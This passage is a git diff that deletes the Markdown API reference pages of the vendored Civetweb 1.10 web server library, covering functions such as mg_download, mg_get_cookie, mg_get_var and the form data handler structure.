-The function `mg_cry()` is called when something happens on a connection. The function takes a format string similar to the `printf()` series of functions with parameters and creates a text string which can then be used for logging. The `mg_cry()` function prints the output to the opened error log stream. Log messages can be processed with the `log_message()` callback function specified in the `struct mg_callbacks` structure.
-
-### See Also
-
-* [`struct mg_callbacks;`](mg_callbacks.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_download.md b/thirdparty/civetweb-1.10/docs/api/mg_download.md
deleted file mode 100644
index 1dbded0..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_download.md
+++ /dev/null
@@ -1,37 +0,0 @@
-# Civetweb API Reference
-
-### `mg_download( host, port, use_ssl, error_buffer, error_buffer_size, fmt, ... );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`host`**|`const char *`|The hostname or IP address of the server|
-|**`port`**|`int`|The port number on the server|
-|**`use_ssl`**|`int`|Use SSL if this value is not equal zero|
-|**`error_buffer`**|`char *`|Buffer to store an error message|
-|**`error_buffer_size`**|`size_t`|Size of the error message buffer including the terminating NUL|
-|**`fmt`**|`const char *`|Format string specifying the remote command to execute|
-|**`...`**|*various*|Parameters used in the format string|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`struct mg_connection *`|A pointer to the connection structure if successful and NULL otherwise|
-
-### Description
-
-The `mg_download()` function is used to download data from a remote webserver. The server address can either be specified as a hostname or IP address and SSL can be used if needed. If the function succeeds, a pointer is returned to a connection structure. The connection must be closed with a call to the [`mg_close_connection()`](mg_close_connection.md) function.
-
-The format string is a format string from the `printf()` series of functions to specify the remote command. An example to get the main index page from Google is the following call:
-
-`conn = mg_download( "google.com", 80, 0, ebuf, sizeof(ebuf),
-                     "%s", "GET / HTTP/1.0\r\nHost: google.com\r\n\r\n" );`
-
-Please note that although Civetweb supports both IPv4 and IPv6 communication that IPv6 addressing is only available if it was enabled at compile time. When running an application it is possible to check if IPv6 support has been compiled in by using the [`mg_check_feature()`](md_check_feature.md) function with the parameter `USE_IPV6`.
-
-### See Also
-
-* [`mg_check_feature();`](mg_check_feature.md)
-* [`mg_close_connection();`](mg_close_connection.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_exit_library.md b/thirdparty/civetweb-1.10/docs/api/mg_exit_library.md
deleted file mode 100644
index 2643403..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_exit_library.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_exit_library( );`
-
-### Parameters
-
-none
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`unsigned`| **0** is returned or error |
-
-### Description
-
-The function `mg_exit_library()` should be called from an application program, when the library should be unloaded.
-It must be called only from one thread (it is not guaranteed to be thread safe).
-
-Only use `mg_exit_library( );` when you used [`mg_init_library( feature );`](api/mg_init_library.md) before.
-
-The library init and exit functions are new in version 1.9 (as dummy implementation) and effective only from version 1.10.
-For compatibility reasons, other functions (such as [`mg_start();`](mg_start.md)) will initialize the required features as well,
-but they will no longer do a de-initialization, leaving a memory leak when the library is unloaded.
-
-### See Also
-
-* [`mg_init_library( feature );`](mg_init_library.md)
-* [`mg_check_feature( feature );`](mg_check_feature.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_form_data_handler.md b/thirdparty/civetweb-1.10/docs/api/mg_form_data_handler.md
deleted file mode 100644
index 2338b72..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_form_data_handler.md
+++ /dev/null
@@ -1,36 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_form_data_handler;`
-
-### Fields
-
-|Field|Description|
-|:---|:---|
-|**`field_found`**|**`int field_found( const char *key, const char *filename, char *path, size_t pathlen, void *user_data )`**;|
-||The callback function `field_found()` is called when a new field has been found. The return value of this callback is used to define how the field should be processed. The parameters contain the following information:|
-||**`key`** - The name of the field as it was named with the `name` tag in the HTML source.|
-||**`filename`** - The name of the file to upload. Please not that this parameter is only valid when the input type was set to `file`. Otherwise this parameter has the value `NULL`.|
-||**`path`** - This is an output parameter used to store the full name of the file including the path to store an incoming file at the computer. This parameter must be provided by the application to Civetweb when a form field of type `file` is found. Please not that together with setting this parameter, the callback function must return `FORM_FIELD_STORAGE_STORE`.i With any other return value the contents of the `path` buffer is ignored by Civetweb.|
-||**`pathlen`** - The length of the buffer where the output path can be stored.|
-||**`user_data`** - A pointer to the value of the field `user_data` of the structure `struct mg_form_data_handler`.|
-||The callback function `field_found()` can return the following values back to Civetweb:|
-||**`FORM_FIELD_STORAGE_SKIP`** - Ignore the field and continue with processing the next field|
-||**`FORM_FIELD_STORAGE_GET`** - Call the callback function `field_get()` to receive the form data|
-||**`FORM_FIELD_STORAGE_STORE`** - Store a file as `path` and overwrite that file if it already exists|
-||**`FORM_FIELD_STORAGE_ABORT`** - Stop parsing the request and ignore all remaining form fields|
-|**`field_get`**|**`int field_get( const char *key, const char *value, size_t valuelen, void *user_data );`**|
-|**`field_store`**|**`int field_store( const char *path, long long file_size, void *user_data );`**|
-||If the callback function `field_found()` returned `FORM_FIELD_STORAGE_STORE`, Civetweb will try to store the received data in a file. If writing the file is successful, the callback function `field_store()` is called. This function is only called after completion of a full upload, not if a file has only partly been uploaded. When only part of a file is received, Civetweb will delete that partly upload in the background and not inform the main application through this callback. The following parameters are provided in the function call:|
-||**`path`** -|
-||**`file_size`** - The path on the server where the file was stored|
-||**`user_data`** - The size of the stored file in bytes|
-|**`user_data`**|**`void *`** The value of the field `user_data` when the callback functions were registered with a call to `mg_handle_form_request();`|
-||The `user_data` field is a user supplied argument that will be passed as parameter to each of callback functions|
-
-### Description
-
-The structure `struct mg_form_data_handler` contains callback functions for handling form fields. Form fields give additional information back from a web page to the server which can be processed by these callback functions.
-
-### See Also
-
-* [`mg_handle_form_request();`](mg_handle_form_request.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_builtin_mime_type.md b/thirdparty/civetweb-1.10/docs/api/mg_get_builtin_mime_type.md
deleted file mode 100644
index c9044ae..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_builtin_mime_type.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_builtin_mime_type( file_name );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`file_name`**|`const char *`|The name of the file for which the MIME type has to be determined|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const char *`|A text string describing the MIME type|
-
-### Description
-
-The function `mg_get_builtin_mime_type()` tries to determine the MIME type of a given file. If the MIME type cannot be determined, the value `text/plain` is returned. Please note that this function does not an intelligent check of the file contents. The MIME type is solely determined based on the file name extension.
-
-### See Also
-
-* [`mg_send_mime_file();`](mg_send_mime_file.md)
-* [`mg_send_mime_file2();`](mg_send_mime_file2.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_connection_info.md b/thirdparty/civetweb-1.10/docs/api/mg_get_connection_info.md
deleted file mode 100644
index 14a2f68..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_connection_info.md
+++ /dev/null
@@ -1,40 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_connection_info( ctx, idx, buffer, buflen );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`struct mg_context *`|The server context handle|
-|**`idx`**|`int`|Connection index within the context|
-|**`buffer**|`char *`|A string buffer to store the information|
-|**`buflen**|`int`|Size of the string buffer (including space for a terminating 0)|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Available context information in bytes (excluding the terminating 0)|
-
-### Description
-
-The function `mg_get_connection_info()` returns statistics information collected for 
-a server connection index.  This may be empty if the server has not been built with 
-statistics support (`#define USE_SERVER_STATS`). 
-If data is available, the returned string is in JSON format. The exact content may
-vary, depending on the connection state and server version.
-
-### Note
-
-This is an experimental interface and may be changed, replaced
-or even removed in the future. Currently the index `idx` must be
-between `0` and `num_threads-1`. The thread is not locked for
-performance reasons, so the information may be inconsistent 
-in rare cases.
-
-### See Also
-
-* [`mg_get_system_info();`](mg_get_system_info.md)
-* [`mg_get_context_info();`](mg_get_context_info.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_context.md b/thirdparty/civetweb-1.10/docs/api/mg_get_context.md
deleted file mode 100644
index ce6cb2b..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_context.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_context( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`const struct mg_connection *`|The connection for which the context has to be returned|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`struct mg_context *`|A pointer to the context of the given connection|
-
-### Description
-
-The function `mg_get_context()` returns the context associated with a connection.
-
-### See Also
-
-* [`mg_start();`](mg_start.md)
-* [`mg_stop();`](mg_stop.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_context_info.md b/thirdparty/civetweb-1.10/docs/api/mg_get_context_info.md
deleted file mode 100644
index 88ffcf7..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_context_info.md
+++ /dev/null
@@ -1,32 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_context_info( ctx, buffer, buflen );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`struct mg_context *`|The server context handle|
-|**`buffer**|`char *`|A string buffer to store the information|
-|**`buflen**|`int`|Size of the string buffer (including space for a terminating 0)|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Available context information in bytes (excluding the terminating 0)|
-
-### Description
-
-The function `mg_get_context_info()` returns statistics information collected for
-the server context.  This may be empty if the server has not been built with
-statistics support (`#define USE_SERVER_STATS`).
-If data is available, the returned string is in JSON format. The exact content may
-vary, depending on the server state and server version.
-
-### See Also
-
-* [`mg_get_system_info();`](mg_get_system_info.md)
-* [`mg_get_connection_info();`](mg_get_connection_info.md)
-
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_cookie.md b/thirdparty/civetweb-1.10/docs/api/mg_get_cookie.md
deleted file mode 100644
index a738bc0..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_cookie.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_cookie( cookie, var_name, buf, buf_len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`cookie`**|`const char *`|The cookie name|
-|**`var_name`**|`const char *`|The variable name|
-|**`buf`**|`char *`|The buffer where to store the contents of the cookie|
-|**`buf_len`**|`size_t`|The length of the cookie buffer, including the terminating NUL|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The length of the cookie or an error code|
-
-### Description
-
-The function `mg_get_cookie()` tries to fetch the value of a certain cookie variable. The contents will either be stored in an application provided buffer, or an error code will be returned. The destination buffer is guaranteed to be NUL terminated if the pointer of the buffer is not a NULL pointer and the size of the buffer is at least one byte.
-
-If the function succeeds, the return value of the function is the length in bytes of the cookie. The value **`-1`** is returned if the requested cookie could not be found and **`-2`** if the destination buffer is represented by a NULL pointer, is zero length or too short to store the whole cookie.
-
-### See Also
-
-* [`mg_get_var();`](mg_get_var.md)
-* [`mg_get_var2();`](mg_get_var2.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_header.md b/thirdparty/civetweb-1.10/docs/api/mg_get_header.md
deleted file mode 100644
index 8ad1810..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_header.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_header( conn, name );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer referencing the connection |
-|**`name`**|`const char *`| The name of the request header |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const char *`| A pointer to the value of the request header, or NULL of no matching header count be found |
-
-### Description
-
-HTTP and HTTPS clients can send request headers to the server to provide details about the communication. These request headers can for example specify the preferred language in which the server should respond and the supported compression algorithms. The function `mg_get_header()` can be called to return the contents of a specific request header. The function will return a pointer to the value text of the header when succesful, and NULL of no matching request header from the client could be found.
-
-### See Also
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_option.md b/thirdparty/civetweb-1.10/docs/api/mg_get_option.md
deleted file mode 100644
index b731dd7..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_option.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_option( ctx, name );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`const struct mg_context *`| A pointer to the webserver context |
-|**`name`**|`const char *`| The name of the option to query |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const char *`| A pointer to the option value in text, or NULL if an error occured |
-
-### Description
-
-When starting the CivetWeb webserver, options are provided to set the wanted behaviour of the server. The options which were used during startup can be queried through the `mg_get_option()` function. Options are read-only and cannot be changed while the webserver is running. The function returns a pointer to a text string containing the value of the queried option, or NULL if an error occured. It is guaranteed however that if a valid option name is provided as a parameter to this function, that a pointer to a string is returned and not NULL. In case an option was empty or NULL during initialisation, `mg_get_option()` will return a pointer to an empty string.
-
-### See Also
-
-* [`mg_start();`](mg_start.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_ports.md b/thirdparty/civetweb-1.10/docs/api/mg_get_ports.md
deleted file mode 100644
index ba492ca..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_ports.md
+++ /dev/null
@@ -1,31 +0,0 @@
-# Civetweb API Reference
-
-### ~~`mg_get_ports( ctx, size, ports, ssl );`~~
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`const struct mg_context *`||
-|**`size`**|`size_t`|The number of ports which can be stored in the buffer|
-|**`ports`**|`int *`|Buffer for storage of the port numbers|
-|**`ssl`**|`int *`|Buffer used to store if SSL is used for the ports|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`size_t`|The number of ports stored in the buffer|
-
-### Description
-
-This function is deprecated. Use [`mg_get_server_ports()`](mg_get_server_ports.md) instead.
-
-The function `mg_get_ports()` returns a list of ports the Civetweb server is listening on. The port numbers are stored in a buffer of integers which is supplied by the calling party. The function also stores information if SSL is used on the ports. This information is stored in a second buffer which should be capable of storing the same amount of items as the ports buffer.
-
-The function returns the number of ports actually stored in the buffer.
-
-### See Also
-
-* [`struct mg_server_ports;`](mg_server_ports.md)
-* [`mg_get_server_ports();`](mg_get_server_ports.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_request_info.md b/thirdparty/civetweb-1.10/docs/api/mg_get_request_info.md
deleted file mode 100644
index b7ddd07..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_request_info.md
+++ /dev/null
@@ -1,28 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_request_info( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`const struct mg_connection *`|The connection for which the request info is needed|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const struct mg_request_info *`|Pointer to the requested info, or NULL if an error occured|
-
-### Description
-
-The function `mg_get_request_info()` returns information about the request on a given connection. This information is returned as a pointer to a [`mg_request_info`](mg_request_info.md) structure. If an error occurs, a NULL pointer is returned instead.
-
-Use this function when implementing a server.
-
-### See Also
-
-* [`struct mg_request_info;`](mg_request_info.md)
-* [`mg_get_response_info();`](mg_get_response_info.md)
-* [`struct mg_response_info;`](mg_response_info.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_request_link.md b/thirdparty/civetweb-1.10/docs/api/mg_get_request_link.md
deleted file mode 100644
index d58a592..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_request_link.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_request_link( conn, buf, buflen );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer referencing the connection |
-|**`buf`**|`char *`| A buffer to store the link |
-|**`buflen`**|`size_t`| Size of the buffer |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`| Return code: <0 for error, >=0 for success |
-
-### Description
-
-Store a formatted link corresponding to the current request.
-
-E.g., returns
-`http://mydomain.com:8080/path/to/callback.ext`
-or 
-`http://127.0.0.1:8080/path/to/callback.ext`
-depending on the auth check settings.
-
-### See Also
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_response.md b/thirdparty/civetweb-1.10/docs/api/mg_get_response.md
deleted file mode 100644
index 3e7b727..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_response.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_response( conn, ebuf, ebuf_len, timeout );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection to listen on|
-|**`ebuf`**|`char *`|Buffer to store an error message|
-|**`ebuf_len`**|`size_t`|Size of the error message buffer including the terminating NUL|
-|**`timeout`**|`int`|Time to wait for a response in milliseconds|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Success value of the wait|
-
-### Description
-
-The function `mg_get_reponse()` wait for a response from a remote server. A return value equal or greater than zero is an indication for success, a negative value us used to signal an error condition. A timeout can be specified which lets the function return after a specified number of milliseconds, even if no data is received from the remote party. If the timeout value is negative, the function will not return until data has been read or an unrecoverable error occurs.
-
-Error messages are stored in a caller supplied error message buffer.
-
-### See Also
-
-* [`mg_connect_client();`](mg_connect_client.md)
-* [`mg_connect_client_secure();`](mg_connect_client_secure.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_response_code_text.md b/thirdparty/civetweb-1.10/docs/api/mg_get_response_code_text.md
deleted file mode 100644
index 79ffa13..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_response_code_text.md
+++ /dev/null
@@ -1,25 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_response_code_text( conn, response_code );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer referencing the connection |
-|**`response_code`**|`int`| Response code for which the text is queried |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const char *`| A pointer to a human readable text explaining the response code. |
-
-### Description
-
-The function `mg_get_response_code_text()` returns a pointer to a human readable text describing the HTTP response code which was provided as a parameter.
-
-### See Also
-
-* [`mg_get_builtin_mime_type();`](mg_get_builtin_mime_type.md)
-* [`mg_version();`](mg_version.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_response_info.md b/thirdparty/civetweb-1.10/docs/api/mg_get_response_info.md
deleted file mode 100644
index 40e7ab8..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_response_info.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_response_info( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`const struct mg_connection *`|The connection for which the response info is needed|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const struct mg_request_info *`|Pointer to the requested info, or NULL if an error occured|
-
-### Description
-
-The function `mg_response_info()` returns information about a response on a client connection opened by `mg_connect_client()`. If an error occurs, a NULL pointer is returned instead.
-
-Use this function when implementing a client.
-
-### See Also
-
-* [`struct mg_response_info;`](mg_response_info.md)
-* [`mg_connect_client();`](mg_connect_client.md)
-* [`mg_get_request_info();`](mg_get_request_info.md)
-* [`struct mg_request_info;`](mg_request_info.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_server_ports.md b/thirdparty/civetweb-1.10/docs/api/mg_get_server_ports.md
deleted file mode 100644
index 323b470..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_server_ports.md
+++ /dev/null
@@ -1,28 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_server_ports( ctx, size, ports );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`const struct mg_context *`|The context for which the server ports are requested|
-|**`size`**|`int`|The size of the buffer to store the port information|
-|**`ports`**|`struct mg_server_ports *`|Buffer to store the port information|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The actual number of ports returned, or an error condition|
-
-### Description
-
-The `mg_get_server_ports()` returns a list with server ports on which the Civetweb server is listening. The ports are returned for a given context and stored with additional information like the SSL and redirection state in a list of structures. The list of structures must be allocated by the calling routine. The size of the structure is also passed to `mg_get_server_ports()`.
-
-The function returns the number of items in the list, or a negative value if an error occured.
-
-### See Also
-
-* [~~`mg_get_ports();`~~](mg_get_ports.md)
-* [`struct mg_server_ports;`](mg_server_ports.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_system_info.md b/thirdparty/civetweb-1.10/docs/api/mg_get_system_info.md
deleted file mode 100644
index 6add98d..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_system_info.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_system_info( buffer, buflen );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`buffer**|`char *`|A string buffer to store the information|
-|**`buflen**|`int`|Size of the string buffer (including space for a terminating 0)|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Available system information in bytes (excluding the terminating 0)|
-
-### Description
-
-The function `mg_get_system_info()` returns information collected for the system 
-(operating system, compiler, version, ...). 
-Currently this data is returned as string is in JSON format, but changes to the 
-format are possible in future versions.  The exact content of the JSON object may vary, 
-depending on the operating system and server version.
-This string should be included for support requests.
-
-### See Also
-
-* [`mg_get_context_info();`](mg_get_context_info.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_user_connection_data.md b/thirdparty/civetweb-1.10/docs/api/mg_get_user_connection_data.md
deleted file mode 100644
index 2e24c13..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_user_connection_data.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_user_connection_data( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`const struct mg_connection *`|The connection for which to return the user data|
-
-### Return Value
-
-| Type | Description | 
-| :--- | :--- |
-|`void *`|A pointer to the user data, or NULL if no user data was registered with the connection|
-
-### Description
-
-The function `mg_get_user_connection_data()` returns the user data associated with a connection. This user data is represented with a pointer which has been prevously registered with a call to [`mg_set_user_connection_data();`](mg_set_user_connection_data.md). With this function it is possible to pass state information between callback functions refering to a specific connection.
-
-### See Also
-
-* [`mg_set_user_connection_data();`](mg_set_user_connection_data.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_user_data.md b/thirdparty/civetweb-1.10/docs/api/mg_get_user_data.md
deleted file mode 100644
index 87bbe04..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_user_data.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_user_data( ctx );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`const struct mg_context *`|The context for which the user data is requested|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`void *`||
-
-### Description
-
-The function `mg_get_user_data()` returns the user data associated with a Civetweb context. This is a pointer value which has previously been used in the call to [`mg_start()`](mg_start.md) to initialize the server context.
-
-### See Also
-
-* [`mg_start();`](mg_start.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_valid_option_names.md b/thirdparty/civetweb-1.10/docs/api/mg_get_valid_option_names.md
deleted file mode 100644
index c6b43ad..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_valid_option_names.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### ~~`mg_get_valid_option_names();`~~
-
-### Parameters
-
-*none*
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const char **`|An array with strings where the even elements represent the option names, and the odd element the option values The array is NULL terminated.|
-
-### Description
-
-The function `mg_get_valid_option_names()` is depricated. Use [`mg_get_valid_options()`](mg_get_valid_options.md) instead.
-
-This function returns an array with option/value pairs describing the valid configuration options for Civetweb. En element value of NULL signals the end of the list.
-
-### See Also
-
-* [`struct mg_option;`](mg_option.md)
-* [`mg_get_valid_options();`](mg_get_valid_options.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_valid_options.md b/thirdparty/civetweb-1.10/docs/api/mg_get_valid_options.md
deleted file mode 100644
index fd6755e..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_valid_options.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_valid_options();`
-
-### Parameters
-
-*none*
-
-### Return Value
-
-| Type | Description | 
-| :--- | :--- |
-|`const struct mg_option *`|An array with all valid configuration options|
-
-### Description
-
-The function `mg_get_valid_options()` returns an array with all valid configuration options of Civetweb. Each element in the array is a structure with three fields which represent the name of the option, the value of the option and the type of the value. The array is terminated with an element for which the name is `NULL`. See for more details about this structure the documentation of [`struct mg_option`](mg_option.md).
-
-### See Also
-
-* [`struct mg_option;`](mg_option.md)
-* [`mg_start();`](mg_start.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_var.md b/thirdparty/civetweb-1.10/docs/api/mg_get_var.md
deleted file mode 100644
index c21c7bb..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_var.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_var( data, data_len, var_name, dst, dst_len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`data`**|`const char *`|Encoded buffer from either POST data or the URI of a GET call|
-|**`data_len`**|`size_t`|Size of the encode buffer including the terminating NULL|
-|**`var_name`**|`const char *`|Name of the variable to search for|
-|**`dst`**|`char *`|Output buffer to store the content of the variable|
-|**`dst_len`**|`size_t`|Length of the output buffer|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The length of the variable or an error code|
-
-### Description
-
-The function `mg_get_var()` returns the value of a variable which is passed to the server with either a POST method, or as a parameter in the URI of a GET call. The data pointer passed to the function points to a form-URI encoded buffer. This can either be POST data or the `request_info.query_string`. The name of the searched variable and a buffer to store the results are also parameters to the function.
-
-The function either returns the length of the variable when successful, **`-1`** if the variable could not be found and **`-2`** if the destination buffer is NULL, has size zero or is too small to store the resulting variable value.
-
-### See Also
-
-* [`mg_get_cookie();`](mg_get_cookie.md)
-* [`mg_get_var2();`](mg_get_var2.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_get_var2.md b/thirdparty/civetweb-1.10/docs/api/mg_get_var2.md
deleted file mode 100644
index 3a47d91..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_get_var2.md
+++ /dev/null
@@ -1,31 +0,0 @@
-# Civetweb API Reference
-
-### `mg_get_var2( data, data_len, var_name, dst, dst_len, occurrence );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`data`**|`const char *`|Encoded data buffer from either POST data or a GET URI|
-|**`data_len`**|`size_t`|The size of the encoded data buffer|
-|**`var_name`**|`const char *`|The name of the variable to search for|
-|**`dst`**|`char *`|Destination buffer to store the variable content|
-|**`dst_len`**|`size_t`|The size of the destination buffer including the terminating NUL|
-|**`occurrence`**|`size_t`|The instance index of the wanted variable|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Length of the variable contents, or an error code|
-
-### Description
-
-The function `mg_get_var2()` can be used to return the contents of a variable passed to the server as either POST data, or in the URI in a GET call. The function is somilar to [`mg_get_var()`](mg_get_var.md) but the difference is that `mg_get_var2()` can be used if the same variable is present multiple times in the data. The `occurence` parameter is used to identify which instance of the variable must be returned where **`0`** is used for the first variable with the specified name, **`1`** for the second and so on.
-
-The function returns the length of the variable content in the return buffer, **`-1`** if a variable with the specified name could not be found and **`-2`** if the pointer to the result buffer is NULL, the size of the result buffer is zero or when the result buffer is too small to contain the variable content and terminating NUL.
-
-### See Also
-
-* [`mg_get_cookie();`](mg_get_cookie.md)
-* [`mg_get_var();`](mg_get_var.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_handle_form_request.md b/thirdparty/civetweb-1.10/docs/api/mg_handle_form_request.md
deleted file mode 100644
index 4a1d888..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_handle_form_request.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_handle_form_request( conn, fdh );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection on which form data must be processed|
-|**`fdh`**|`struct mg_form_data_handler`|Structure with callback functions to to the heavy work|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The number of fields processed, or an error code|
-
-### Description
-
